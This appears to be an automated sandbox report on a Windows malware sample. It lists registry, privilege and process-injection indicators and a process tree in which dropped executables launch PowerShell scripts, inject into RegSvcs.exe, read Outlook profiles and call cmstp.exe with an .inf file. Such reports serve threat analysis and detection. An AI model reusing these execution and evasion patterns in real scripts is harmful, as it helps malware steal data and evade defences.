\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString wmiprvse.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier wmiprvse.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 wmiprvse.exe -
Delays execution with timeout.exe 1 IoCs
pid Process 3928 timeout.exe -
Gathers network information 2 TTPs 3 IoCs
Uses commandline utility to view network configuration.
pid Process 2908 ipconfig.exe 2284 ipconfig.exe 2592 ipconfig.exe -
Kills process with taskkill 6 IoCs
pid Process 2592 taskkill.exe 2792 taskkill.exe 2432 taskkill.exe 4604 taskkill.exe 3436 taskkill.exe 1928 taskkill.exe -
Modifies data under HKEY_USERS 46 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe -
Modifies registry class 2 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Local Settings cmd.exe Key created \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Local Settings firefox.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 6116 PING.EXE -
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 1116 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 3632 1M25e4.exe 3632 1M25e4.exe 1584 skotes.exe 1584 skotes.exe 2152 2Z2786.exe 2152 2Z2786.exe 3128 3P57p.exe 3128 3P57p.exe 1632 powershell.exe 1632 powershell.exe 2848 4r428k.exe 2848 4r428k.exe 2848 4r428k.exe 2848 4r428k.exe 428 a6938fd3d4.exe 428 a6938fd3d4.exe 1996 skotes.exe 1996 skotes.exe 3376 powershell.exe 3376 powershell.exe 3376 powershell.exe 3376 powershell.exe 2616 powershell.exe 2616 powershell.exe 1072 RegSvcs.exe 1072 RegSvcs.exe 1072 RegSvcs.exe 1072 RegSvcs.exe 1072 RegSvcs.exe 1072 RegSvcs.exe 1072 RegSvcs.exe 1072 RegSvcs.exe 1072 RegSvcs.exe 1072 RegSvcs.exe 1072 RegSvcs.exe 1072 RegSvcs.exe 1072 RegSvcs.exe 1072 RegSvcs.exe 1072 RegSvcs.exe 1072 RegSvcs.exe 1072 RegSvcs.exe 1072 RegSvcs.exe 1072 RegSvcs.exe 1072 RegSvcs.exe 1072 RegSvcs.exe 1072 RegSvcs.exe 1072 RegSvcs.exe 1072 RegSvcs.exe 1072 RegSvcs.exe 1072 RegSvcs.exe 1072 RegSvcs.exe 1072 RegSvcs.exe 1072 RegSvcs.exe 1072 RegSvcs.exe 1072 RegSvcs.exe 1072 RegSvcs.exe 1072 RegSvcs.exe 1072 RegSvcs.exe 1072 RegSvcs.exe 1072 RegSvcs.exe 1072 RegSvcs.exe 1072 RegSvcs.exe 1072 RegSvcs.exe 1072 RegSvcs.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 1632 powershell.exe Token: SeDebugPrivilege 2848 4r428k.exe Token: SeDebugPrivilege 3376 powershell.exe Token: SeDebugPrivilege 1908 RegSvcs.exe Token: SeDebugPrivilege 2616 powershell.exe Token: SeDebugPrivilege 1072 RegSvcs.exe Token: SeDebugPrivilege 2592 taskkill.exe Token: SeDebugPrivilege 4392 powershell.exe Token: SeDebugPrivilege 2280 powershell.exe Token: SeDebugPrivilege 2792 taskkill.exe Token: SeDebugPrivilege 2432 taskkill.exe Token: SeDebugPrivilege 4604 taskkill.exe Token: SeDebugPrivilege 3436 taskkill.exe Token: SeDebugPrivilege 1928 taskkill.exe Token: SeDebugPrivilege 2876 firefox.exe Token: SeDebugPrivilege 2876 firefox.exe Token: SeDebugPrivilege 4764 1081e922e8.exe Token: SeDebugPrivilege 6380 powershell.exe Token: SeDebugPrivilege 3736 dialer.exe Token: SeShutdownPrivilege 5700 powercfg.exe Token: SeCreatePagefilePrivilege 5700 powercfg.exe Token: SeShutdownPrivilege 1568 powercfg.exe Token: SeCreatePagefilePrivilege 1568 powercfg.exe Token: SeShutdownPrivilege 1948 powercfg.exe Token: SeCreatePagefilePrivilege 1948 powercfg.exe Token: SeShutdownPrivilege 4448 powercfg.exe Token: SeCreatePagefilePrivilege 4448 powercfg.exe Token: SeDebugPrivilege 3304 powershell.exe Token: SeDebugPrivilege 2156 dialer.exe Token: SeShutdownPrivilege 1948 powercfg.exe Token: SeCreatePagefilePrivilege 1948 powercfg.exe Token: SeShutdownPrivilege 4232 powercfg.exe Token: SeCreatePagefilePrivilege 4232 powercfg.exe Token: SeLockMemoryPrivilege 5956 dialer.exe Token: SeShutdownPrivilege 4516 powercfg.exe Token: SeCreatePagefilePrivilege 4516 powercfg.exe Token: SeShutdownPrivilege 3284 powercfg.exe Token: SeCreatePagefilePrivilege 3284 powercfg.exe Token: SeAssignPrimaryTokenPrivilege 2184 svchost.exe Token: SeIncreaseQuotaPrivilege 2184 svchost.exe Token: SeSecurityPrivilege 2184 svchost.exe Token: SeTakeOwnershipPrivilege 2184 svchost.exe Token: SeLoadDriverPrivilege 2184 svchost.exe Token: SeSystemtimePrivilege 2184 svchost.exe Token: SeBackupPrivilege 2184 svchost.exe Token: SeRestorePrivilege 2184 svchost.exe Token: SeShutdownPrivilege 2184 svchost.exe Token: SeSystemEnvironmentPrivilege 2184 svchost.exe Token: SeUndockPrivilege 2184 svchost.exe Token: SeManageVolumePrivilege 2184 svchost.exe Token: SeAssignPrimaryTokenPrivilege 2184 svchost.exe Token: SeIncreaseQuotaPrivilege 2184 svchost.exe Token: SeSecurityPrivilege 2184 svchost.exe Token: SeTakeOwnershipPrivilege 2184 svchost.exe Token: SeLoadDriverPrivilege 2184 svchost.exe Token: SeSystemtimePrivilege 2184 svchost.exe Token: SeBackupPrivilege 2184 svchost.exe Token: SeRestorePrivilege 2184 svchost.exe Token: SeShutdownPrivilege 2184 svchost.exe Token: SeSystemEnvironmentPrivilege 2184 svchost.exe Token: SeUndockPrivilege 2184 svchost.exe Token: SeManageVolumePrivilege 2184 svchost.exe Token: SeAssignPrimaryTokenPrivilege 2184 svchost.exe Token: SeIncreaseQuotaPrivilege 2184 svchost.exe -
Suspicious use of FindShellTrayWindow 33 IoCs
pid Process 3632 1M25e4.exe 3652 e08cedcd1e.exe 3652 e08cedcd1e.exe 3652 e08cedcd1e.exe 3652 e08cedcd1e.exe 3652 e08cedcd1e.exe 3652 e08cedcd1e.exe 3652 e08cedcd1e.exe 2876 firefox.exe 2876 firefox.exe 2876 firefox.exe 2876 firefox.exe 2876 firefox.exe 2876 firefox.exe 2876 firefox.exe 2876 firefox.exe 2876 firefox.exe 2876 firefox.exe 2876 firefox.exe 2876 firefox.exe 2876 firefox.exe 2876 firefox.exe 2876 firefox.exe 2876 firefox.exe 2876 firefox.exe 2876 firefox.exe 2876 firefox.exe 2876 firefox.exe 2876 firefox.exe 3652 e08cedcd1e.exe 3652 e08cedcd1e.exe 3652 e08cedcd1e.exe 3652 e08cedcd1e.exe -
Suspicious use of SendNotifyMessage 31 IoCs
pid Process 3652 e08cedcd1e.exe 3652 e08cedcd1e.exe 3652 e08cedcd1e.exe 3652 e08cedcd1e.exe 3652 e08cedcd1e.exe 3652 e08cedcd1e.exe 3652 e08cedcd1e.exe 2876 firefox.exe 2876 firefox.exe 2876 firefox.exe 2876 firefox.exe 2876 firefox.exe 2876 firefox.exe 2876 firefox.exe 2876 firefox.exe 2876 firefox.exe 2876 firefox.exe 2876 firefox.exe 2876 firefox.exe 2876 firefox.exe 2876 firefox.exe 2876 firefox.exe 2876 firefox.exe 2876 firefox.exe 2876 firefox.exe 2876 firefox.exe 2876 firefox.exe 3652 e08cedcd1e.exe 3652 e08cedcd1e.exe 3652 e08cedcd1e.exe 3652 e08cedcd1e.exe -
Suspicious use of SetWindowsHookEx 5 IoCs
pid Process 1072 RegSvcs.exe 1072 RegSvcs.exe 2876 firefox.exe 2068 Conhost.exe 5804 Conhost.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4412 wrote to memory of 860 4412 8f76aedb3b40874e7da7e95d77eeedeb75c4ea4c56e9ccc2a5f2d8a25cf32b76.exe 83 PID 4412 wrote to memory of 860 4412 8f76aedb3b40874e7da7e95d77eeedeb75c4ea4c56e9ccc2a5f2d8a25cf32b76.exe 83 PID 4412 wrote to memory of 860 4412 8f76aedb3b40874e7da7e95d77eeedeb75c4ea4c56e9ccc2a5f2d8a25cf32b76.exe 83 PID 860 wrote to memory of 2856 860 Y6L36.exe 84 PID 860 wrote to memory of 2856 860 Y6L36.exe 84 PID 860 wrote to memory of 2856 860 Y6L36.exe 84 PID 2856 wrote to memory of 3632 2856 d1l76.exe 85 PID 2856 wrote to memory of 3632 2856 d1l76.exe 85 PID 2856 wrote to memory of 3632 2856 d1l76.exe 85 PID 3632 wrote to memory of 1584 3632 1M25e4.exe 86 PID 3632 wrote to memory of 1584 3632 1M25e4.exe 86 PID 3632 wrote to memory of 1584 3632 1M25e4.exe 86 PID 2856 wrote to memory of 2152 2856 d1l76.exe 87 PID 2856 wrote to memory of 2152 2856 d1l76.exe 87 PID 2856 wrote to memory of 2152 2856 d1l76.exe 87 PID 860 wrote to memory of 3128 860 Y6L36.exe 91 PID 860 wrote to memory of 3128 860 Y6L36.exe 91 PID 860 wrote to memory of 3128 860 Y6L36.exe 91 PID 1584 wrote to memory of 1632 1584 skotes.exe 92 PID 1584 wrote to memory of 1632 1584 skotes.exe 92 PID 1584 wrote to memory of 1632 1584 skotes.exe 92 PID 4412 wrote to memory of 2848 4412 8f76aedb3b40874e7da7e95d77eeedeb75c4ea4c56e9ccc2a5f2d8a25cf32b76.exe 97 PID 4412 wrote to memory of 2848 4412 8f76aedb3b40874e7da7e95d77eeedeb75c4ea4c56e9ccc2a5f2d8a25cf32b76.exe 97 PID 4412 wrote to memory of 2848 4412 8f76aedb3b40874e7da7e95d77eeedeb75c4ea4c56e9ccc2a5f2d8a25cf32b76.exe 97 PID 1584 wrote to memory of 428 1584 skotes.exe 100 PID 1584 wrote to memory of 428 1584 skotes.exe 100 PID 1584 wrote to memory of 428 1584 skotes.exe 100 PID 1632 wrote to memory of 2908 1632 powershell.exe 102 PID 1632 wrote to memory of 2908 1632 powershell.exe 102 PID 1632 wrote to memory of 2908 1632 powershell.exe 102 PID 1632 wrote to memory of 1496 1632 powershell.exe 103 PID 1632 wrote to memory of 1496 1632 powershell.exe 103 PID 1632 wrote to memory of 1496 1632 powershell.exe 103 PID 1632 wrote to memory of 1496 1632 powershell.exe 103 PID 1632 wrote to memory of 1496 1632 powershell.exe 103 PID 1632 wrote to memory of 1496 1632 powershell.exe 103 PID 1632 wrote to memory of 1496 1632 powershell.exe 103 PID 1632 wrote to memory of 1496 1632 powershell.exe 103 PID 1632 wrote to memory of 1496 1632 powershell.exe 103 PID 1632 wrote to memory of 1496 1632 powershell.exe 103 PID 1496 wrote to memory of 3376 1496 RegSvcs.exe 111 PID 1496 wrote to memory of 3376 1496 RegSvcs.exe 111 PID 1496 wrote to memory of 3376 1496 RegSvcs.exe 111 PID 3376 wrote to memory of 2284 3376 powershell.exe 113 PID 3376 wrote to memory of 2284 3376 powershell.exe 113 PID 3376 wrote to memory of 2284 3376 powershell.exe 113 PID 3376 wrote to memory of 2044 3376 powershell.exe 114 PID 3376 wrote to memory of 2044 3376 powershell.exe 114 PID 3376 wrote to memory of 2044 3376 powershell.exe 114 PID 3376 wrote to memory of 1908 3376 powershell.exe 115 PID 3376 wrote to memory of 1908 3376 powershell.exe 115 PID 3376 wrote to memory of 1908 3376 powershell.exe 115 PID 3376 wrote to memory of 1908 3376 powershell.exe 115 PID 3376 wrote to memory of 1908 3376 powershell.exe 115 PID 3376 wrote to memory of 1908 3376 powershell.exe 115 PID 3376 wrote to memory of 1908 3376 powershell.exe 115 PID 3376 wrote to memory of 1908 3376 powershell.exe 115 PID 1496 wrote to memory of 2616 1496 RegSvcs.exe 116 PID 1496 wrote to memory of 2616 1496 RegSvcs.exe 116 PID 1496 wrote to memory of 2616 1496 RegSvcs.exe 116 PID 2616 wrote to memory of 2592 2616 powershell.exe 127 PID 2616 wrote to memory of 2592 2616 powershell.exe 127 PID 2616 wrote to memory of 2592 2616 powershell.exe 127 PID 2616 wrote to memory of 1072 2616 powershell.exe 120 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Views/modifies file attributes 1 TTPs 3 IoCs
pid Process 5712 attrib.exe 1172 attrib.exe 1996 attrib.exe -
outlook_office_path 1 IoCs
description ioc Process Key queried \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Office\20.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe -
outlook_win_path 1 IoCs
description ioc Process Key queried \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe
Processes
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵PID:612
-
C:\Windows\system32\dwm.exe"dwm.exe"2⤵PID:336
-
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵PID:660
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM1⤵PID:956
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc1⤵PID:388
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts1⤵PID:868
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule1⤵PID:1132
-
C:\Windows\system32\taskhostw.exetaskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}2⤵PID:2972
-
-
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exeC:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:1996
-
-
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exeC:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:6940
-
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog1⤵PID:1140
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService1⤵PID:1148
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s nsi1⤵PID:1236
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc1⤵PID:1272
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc1⤵PID:1288
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc1⤵PID:1376
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp1⤵PID:1384
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager1⤵PID:1468
-
C:\Windows\system32\sihost.exesihost.exe2⤵PID:2656
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem1⤵PID:1552
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s Themes1⤵PID:1572
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc1⤵PID:1668
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s SENS1⤵PID:1704
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder1⤵PID:1736
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:1812
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s netprofm1⤵PID:1820
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache1⤵PID:1892
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:1900
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository1⤵PID:1932
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection1⤵PID:1976
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵PID:1844
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation1⤵PID:2140
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2184
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc1⤵PID:2268
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT1⤵PID:2456
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent1⤵PID:2464
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc1⤵PID:2732
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc1⤵PID:2744
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService1⤵PID:2752
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks1⤵PID:2760
-
C:\Windows\sysmon.exeC:\Windows\sysmon.exe1⤵PID:2780
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer1⤵PID:2812
-
C:\Windows\system32\wbem\unsecapp.exeC:\Windows\system32\wbem\unsecapp.exe -Embedding1⤵PID:3056
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker1⤵PID:2168
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc1⤵PID:3312
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵PID:3476
-
C:\Users\Admin\AppData\Local\Temp\8f76aedb3b40874e7da7e95d77eeedeb75c4ea4c56e9ccc2a5f2d8a25cf32b76.exe"C:\Users\Admin\AppData\Local\Temp\8f76aedb3b40874e7da7e95d77eeedeb75c4ea4c56e9ccc2a5f2d8a25cf32b76.exe"2⤵
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4412 -
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Y6L36.exeC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Y6L36.exe3⤵
- Executes dropped EXE
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:860 -
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\d1l76.exeC:\Users\Admin\AppData\Local\Temp\IXP001.TMP\d1l76.exe4⤵
- Executes dropped EXE
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2856 -
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\1M25e4.exeC:\Users\Admin\AppData\Local\Temp\IXP002.TMP\1M25e4.exe5⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:3632 -
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1584 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy remotesigned -File "C:\Users\Admin\AppData\Local\Temp\1015216041\wOKhy9f.ps1"7⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1632 -
C:\Windows\SysWOW64\ipconfig.exe"C:\Windows\system32\ipconfig.exe" /flushdns8⤵
- System Location Discovery: System Language Discovery
- Gathers network information
PID:2908
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"8⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1496 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy remotesigned -File "C:\Users\Admin\AppData\Roaming\10000090140\S.ps1"9⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3376 -
C:\Windows\SysWOW64\ipconfig.exe"C:\Windows\system32\ipconfig.exe" /flushdns10⤵
- System Location Discovery: System Language Discovery
- Gathers network information
PID:2284
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"10⤵PID:2044
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"10⤵
- Accesses Microsoft Outlook profiles
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- outlook_office_path
- outlook_win_path
PID:1908
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy remotesigned -File "C:\Users\Admin\AppData\Roaming\10000100140\8.ps1"9⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2616 -
C:\Windows\SysWOW64\ipconfig.exe"C:\Windows\system32\ipconfig.exe" /flushdns10⤵
- System Location Discovery: System Language Discovery
- Gathers network information
PID:2592
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"10⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:1072 -
\??\c:\windows\SysWOW64\cmstp.exe"c:\windows\system32\cmstp.exe" /au C:\Windows\temp\23a11xhu.inf11⤵
- System Location Discovery: System Language Discovery
PID:1520
-
-
-
